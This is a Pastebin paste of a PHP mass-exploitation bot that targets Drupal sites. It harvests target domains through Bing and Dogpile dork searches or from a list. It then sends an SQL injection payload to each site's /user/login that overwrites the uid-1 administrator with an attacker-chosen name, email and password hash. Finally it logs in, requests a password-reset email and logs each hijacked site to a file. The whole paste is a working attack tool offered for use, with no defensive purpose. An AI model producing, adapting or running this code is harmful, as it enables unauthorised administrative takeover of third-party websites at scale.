Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- Class Drupal{
- //~CREATE BY PAKHAXOR - DRUPAL ADD ADMIN AUTO EXPLOIT (BOT)
- public $username = 'default'; // u can change username and default password admin
- public $email = 'default%40default.com'; // encode to this web http://www.urlencoder.org/
- //how to run this tool ? using php namefile.php
- public function CurlPost($url, $post = false,$type=null){
- if($type == 1)
- {
- $ch = curl_init();
- curl_setopt ($ch, CURLOPT_URL, $url);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
- curl_setopt ($ch, CURLOPT_TIMEOUT, 60);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_POST, 1);
- $headers = array();
- $headers[] = 'Accept-Encoding: gzip, deflate';
- $headers[] = 'Content-Type: application/x-www-form-urlencoded';
- curl_setopt ($ch, CURLOPT_HTTPHEADER, $headers);
- curl_setopt ($ch, CURLOPT_HEADER, 1);
- $result = curl_exec ($ch);
- curl_close($ch);
- return $result;
- }
- if($type == 2)
- {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
- if($post !== false){
- $isi = '';
- foreach($post as $key=>$value){
- $isi .= $key.'='.$value.'&';
- }
- rtrim($isi, '&');
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_POST, count($isi));
- curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
- curl_setopt($ch, CURLOPT_POSTFIELDS, $isi);
- }
- $data = curl_exec($ch);
- curl_close($ch);
- return $data;
- }
- }
- public function ReadStdin($prompt, $valid_inputs=null, $default = '') {
- while(!isset($input) || (is_array($valid_inputs) && !in_array($input, $valid_inputs)) || ($valid_inputs == 'is_file' && !is_file($input))) {
- echo $prompt;
- $input = strtolower(trim(fgets(STDIN)));
- break;
- if(empty($input) && !empty($default)) {
- $input = $default;
- }
- }
- return $input;
- }
- public function NameXFile($file)
- {
- $validation = explode('.',$file);
- $ext = array("txt","log","lst");
- for($x=0;$x<count($ext);$x++)
- {
- if($validation[1] == $ext[$x++])
- {
- return true;
- }
- }
- }
- public function getDomain($keyword)
- {
- if($keyword == 1)
- {
- return array($argv[1]);
- }
- }
- function SearchEngine($dork,$angka)
- {
- $list = array();
- if($angka == 1)
- {
- for($i=0;$i<=1000;$i+=10){
- $search = $this->CurlPost("http://www.bing.com/search?q=".urlencode($dork)."&first=".$i,false,2);
- preg_match_all('/<a href=\"?http:\/\/([^\"]*)\"/m', $search, $m);
- foreach($m[1] as $link){
- if(!preg_match("/live|msn|bing|microsoft/",$link)){
- if(!in_array($link,$list)){
- $domain = $this->filterDomain($link);
- $list[] = "http://".$domain;
- }
- }
- }
- echo ".";
- }
- echo "\nDitemukan : ".count(array_unique($list))."\n";
- return array_unique($list);
- }
- if($angka == 2)
- {
- $ccbing = array("ca","br","be","nl","uk","it","es","de","no","dk","se","ch","ru","jp","cn","kr","mx","ar","cl","au");
- for($x=0;$x<=count($ccbing)-1;$x++){
- for($i=0;$i<=1000;$i+=10){
- $search = $this->CurlPost("http://www.bing.com/search?q=".urlencode($dork)."&cc=".$ccbing[$x]."&rf=1&first=".$i."&FORM=PORE",false,2);
- preg_match_all('/<a href=\"?http:\/\/([^\"]*)\"/m', $search, $m);
- foreach($m[1] as $link){
- if(!preg_match("/live|msn|bing|microsoft/",$link)){
- if(!in_array($link,$list)){
- $domain = $this->filterDomain($link);
- $fp = fopen("domain.txt", 'a+');
- fwrite($fp, "http://".$domain."\n");
- fclose($fp);
- $list[] = "http://".$domain;;
- }
- }
- }
- echo ".";
- }
- }
- echo "\nDitemukan : ".count(array_unique($list))."\n";
- return array_unique($list);
- }
- if($angka == 3)
- {
- for($x=1;$x<=1000;$x+=10){
- $check = $this->CurlPost('http://www.dogpile.com/dogpilecontrol/search/web?qsi='.$x.'&q='.$dork.'&fcoid=4&fcop=results-bottom&fpid=2',false,2);
- preg_match_all('# target="_blank">(.*?)</a>#',$check,$matches);
- foreach($matches[1] as $domain)
- {
- $domain = str_replace("<strong>", "", $domain);
- $domain = str_replace("</strong>", "", $domain);
- $list[] = $this->filterDomain($domain);
- }
- echo ".";
- }
- echo "\nDitemukan : ".count(array_unique($list))."\n";
- return array_unique($list);
- }
- }
- public function filterDomain($domains)
- {
- $url = parse_url($domains);
- $target = (!isset($url["scheme"]) ? "http://".$domains : $url["scheme"]."://".$url["host"]);
- if(preg_match('/http/',$target))
- {
- $reparse = parse_url($target);
- $domain = (!isset($reparse["scheme"]) ? $target : $reparse["host"]);
- if (!filter_var("http://$domain", FILTER_VALIDATE_URL) === false)
- {
- if($domain !== "")
- {
- $checkdomain = explode('.',$domain);
- if(isset($checkdomain[1]))
- {
- return $domain;
- }
- }
- }
- }
- }
- public function wrongpress($read,$angka)
- {
- if(!isset($read) or $read > $angka or !(int)($read) or $read = "")
- {
- echo "Wrong Press !!!";
- die();
- }
- }
- public function curl($url,$post)
- {
- $ch = curl_init();
- curl_setopt ($ch, CURLOPT_URL, "$url");
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0");
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- $data = curl_exec($ch);
- curl_close($ch);
- return $data;
- }
- public function exploiter($url)
- {
- $post_data = "name[0;update users set name %3D '".$this->username."' , mail %3D '".$this->email."' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
- $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
- ", 'content' => $post_data));
- $ctx = stream_context_create($params);
- $addurl = array('/user/login','?q=node&destination=node');
- $data1 = @file_get_contents($url.$addurl[0], null, $ctx);
- $data2 = @file_get_contents($url.$addurl[1],null,$ctx);
- if(preg_match('/edit-name/',$data1))
- {
- return true;
- }elseif(stristr($data2, 'mb_strlen() expects parameter 1 to be string') && $data2){
- return true;
- }else{
- return false;
- }
- }
- }
- $drupal = new Drupal();
- $getdomains = $drupal->ReadStdin("[1] Making Dork\n[2] Making List\n[3] Making Url\nSelected : ", array('1','2','3'));
- $drupal->wrongpress($getdomains,3);
- if($getdomains == 1)
- {
- $dorker = $drupal->ReadStdin("[1] Bing\n[2] Bing By Country\n[3] Dogpile\nSelected : ",array("keyword"));
- if(isset($dorker))
- {
- $drupal->wrongpress($dorker,3);
- $url1 = $drupal->ReadStdin("Masukkan Dork : ",array("keyword"));
- echo "Grabbing : ";
- $get = $drupal->SearchEngine($url1,$dorker);
- }
- }
- if($getdomains == 2)
- {
- $url2 = $drupal->ReadStdin("Masukkan Namafile TXT : ",array("keyword"));
- $get =($drupal->NameXFile($url2) == true) ? file($url2) : die("Masukkan Nama File Dengan Benar !!!");
- }
- if($getdomains == 3)
- {
- $url3 = $drupal->ReadStdin("Masukkan url : ",array("keyword"));
- $get = array($url3);
- }
- $x=1;
- foreach($get as $url)
- {
- if($getdomains == 2)
- {
- $url = str_replace("\r", "", $url);
- $url = str_replace("\n", "", $url);
- }
- echo "++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
- $exploiter = $drupal->exploiter($url);
- $post = ('name='.$drupal->username.'&pass=admin&form_build_id=form-890Yt0ro4z3d4snrpn6DMNBIRaBjTAJrmnrrw6LIUNU&form_id=user_login&op=Log+in');
- $postlogin = $drupal->curl($url.'/user/login',$post);
- if($exploiter == true)
- {
- $sendemail = $drupal->curl("$url/user/password",'name='.$drupal->email.'&form_build_id=form-FZvl_8CktOoEYX_IccDyPsLGFgfrNLhdGlLR2pCCrAQ&form_id=user_pass&op=E-mail+new+password');
- if(preg_match('/edit-name/',$postlogin)) {
- $message = "[X] ".$url."/user/login => Can't Login\n";
- echo $message;
- if(preg_match('/messages error/',$sendemail))
- {
- echo "[X] ".$url."/user/password => Failed Send Email\n";
- }
- else{
- echo "[Y] ".$url."/user/password => Success Send Email\n";
- }
- }
- else{
- $message = "[Y] ".$url."/user/login => Success Login Username=".$drupal->username." Password=admin\n";
- $fp = fopen("drupalsuccess.txt", 'a+');
- fwrite($fp, $message);
- fclose($fp);
- echo $message;
- }
- }
- else{
- echo $url.' => Not Vuln'."\n";
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement